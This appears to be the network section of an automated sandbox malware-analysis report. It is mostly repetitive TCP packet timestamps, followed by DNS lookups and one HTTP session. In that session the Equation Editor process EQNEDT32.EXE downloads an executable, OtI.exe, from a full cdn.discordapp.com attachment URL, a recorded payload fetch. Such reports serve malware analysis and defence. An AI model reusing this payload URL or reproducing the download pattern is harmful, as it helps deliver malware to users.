                                                      May 27, 2021 21:42:24.883385897 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.883400917 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.883404970 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.883415937 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.883433104 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.883435011 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.883450031 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.883467913 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.883887053 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.883910894 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.883928061 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.883934021 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.883956909 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.883968115 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.883980989 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884004116 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884012938 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884030104 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884053946 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884063005 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884078979 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884103060 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884113073 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884124994 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884160995 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884161949 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884182930 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884198904 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884213924 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884222984 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884231091 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884248018 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884251118 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884268999 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884284973 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884285927 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884300947 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884315014 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884316921 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884332895 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884347916 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884350061 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884363890 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884380102 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884382010 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884399891 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884413958 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884414911 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884430885 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884445906 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884449959 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884475946 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884848118 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884869099 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884891987 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884910107 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884913921 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884937048 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884949923 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.884962082 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884987116 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.884996891 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.885010958 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885034084 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885051012 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.885055065 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885073900 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885086060 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.885094881 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885111094 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885132074 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885133982 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.885150909 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885162115 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.885169029 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885184050 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885200024 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.885205984 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885222912 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885237932 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.885237932 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885255098 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885272026 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885272026 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.885310888 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.885904074 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885936022 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885958910 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.885977030 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.885983944 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886008024 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886018991 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886029005 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886044979 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886060953 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886066914 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886076927 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886092901 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886096954 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886109114 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886125088 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886127949 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886145115 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886162043 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886163950 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886178970 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886193037 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886193991 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886210918 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886225939 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886234999 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886241913 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886256933 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886264086 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886290073 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886297941 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886311054 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886336088 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886343956 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886359930 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886382103 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886393070 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886405945 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886429071 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886446953 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886465073 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886482954 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886502028 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886518955 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886529922 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886538029 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886553049 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886574030 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886586905 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886598110 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886620998 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886631012 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886642933 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886666059 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886674881 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886687040 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886708021 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886720896 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886725903 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886742115 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886755943 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886763096 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886779070 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886794090 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886795044 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886810064 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886823893 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886825085 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886843920 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886856079 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886862040 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886878014 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886893988 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886894941 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886914015 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886928082 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886930943 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886950970 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886961937 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.886967897 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.886986971 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887002945 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887003899 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887021065 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887039900 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887042999 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887058973 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887132883 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887311935 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887336969 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887353897 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887361050 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887382984 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887394905 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887407064 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887433052 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887447119 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887456894 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887479067 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887492895 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887502909 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887525082 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887538910 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887547970 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887573004 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887582064 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887597084 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887633085 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887635946 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887656927 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887676001 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887691975 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887693882 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887706995 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887722015 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887722015 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887742996 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887753963 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887759924 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887774944 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887790918 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887790918 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887806892 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887820959 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887823105 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887839079 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887854099 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887855053 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887876034 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887888908 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887892962 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887908936 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887923956 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887929916 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887942076 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887960911 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887976885 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.887983084 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.887996912 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888247967 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888271093 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888293982 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888304949 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888319969 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888339043 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888344049 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888367891 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888375998 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888391972 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888417006 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888426065 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888441086 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888463974 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888484001 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888485909 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888510942 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888526917 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888537884 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888562918 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888572931 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888590097 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888616085 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888631105 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888633013 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888648033 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888664007 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888664007 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888679981 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888695002 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888695955 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888711929 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888726950 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888734102 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888746023 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888757944 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888763905 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888778925 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888794899 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888796091 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888809919 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888824940 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888833046 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888840914 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888856888 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888860941 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888876915 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888890982 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888892889 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888911963 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888927937 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889209986 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889233112 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889254093 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889254093 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889277935 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889286041 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889302969 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889323950 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889338017 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889345884 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889368057 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889375925 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889386892 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889403105 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889417887 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889417887 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889434099 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889452934 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889453888 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889470100 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889482021 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889484882 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889516115 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.909161091 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:26.418021917 CEST4916780192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:26.418401957 CEST49168443192.168.2.22162.159.130.233

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 27, 2021 21:42:23.764784098 CEST5219753192.168.2.228.8.8.8
                                                      May 27, 2021 21:42:23.827925920 CEST53521978.8.8.8192.168.2.22
                                                      May 27, 2021 21:42:23.849973917 CEST5309953192.168.2.228.8.8.8
                                                      May 27, 2021 21:42:23.913418055 CEST53530998.8.8.8192.168.2.22

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      May 27, 2021 21:42:23.764784098 CEST192.168.2.228.8.8.80x8766Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                      May 27, 2021 21:42:23.849973917 CEST192.168.2.228.8.8.80x4177Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      May 27, 2021 21:42:23.827925920 CEST8.8.8.8192.168.2.220x8766No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                      May 27, 2021 21:42:23.827925920 CEST8.8.8.8192.168.2.220x8766No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                      May 27, 2021 21:42:23.827925920 CEST8.8.8.8192.168.2.220x8766No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                      May 27, 2021 21:42:23.827925920 CEST8.8.8.8192.168.2.220x8766No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                      May 27, 2021 21:42:23.827925920 CEST8.8.8.8192.168.2.220x8766No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                      May 27, 2021 21:42:23.913418055 CEST8.8.8.8192.168.2.220x4177No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                      May 27, 2021 21:42:23.913418055 CEST8.8.8.8192.168.2.220x4177No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                      May 27, 2021 21:42:23.913418055 CEST8.8.8.8192.168.2.220x4177No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                      May 27, 2021 21:42:23.913418055 CEST8.8.8.8192.168.2.220x4177No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                      May 27, 2021 21:42:23.913418055 CEST8.8.8.8192.168.2.220x4177No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • cdn.discordapp.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.2249167162.159.130.23380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      TimestampkBytes transferredDirectionData
                                                      May 27, 2021 21:42:23.956628084 CEST0OUTGET /attachments/843685789120331799/847476783744811018/OtI.exe HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Host: cdn.discordapp.com
                                                      May 27, 2021 21:42:24.015337944 CEST1INHTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 27 May 2021 19:42:24 GMT
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Cache-Control: max-age=3600
                                                      Expires: Thu, 27 May 2021 20:42:24 GMT
                                                      Location: https://cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                      cf-request-id: 0a50f284f500002c016c8eb000000001
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6zVpDszxQSru3%2F%2Fgi6JYE5%2B%2FE%2Fu5y3lGj156NtaqWDTurgayB1BvGK1bFxXVNCvDibKfV8Qr%2BFAvxFwofepvVUWfwemhIK9vxqNRHIjc%2FYJD44zYYQNVGsksDiYo%2BAE%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 6561b9e7eef02c01-FRA
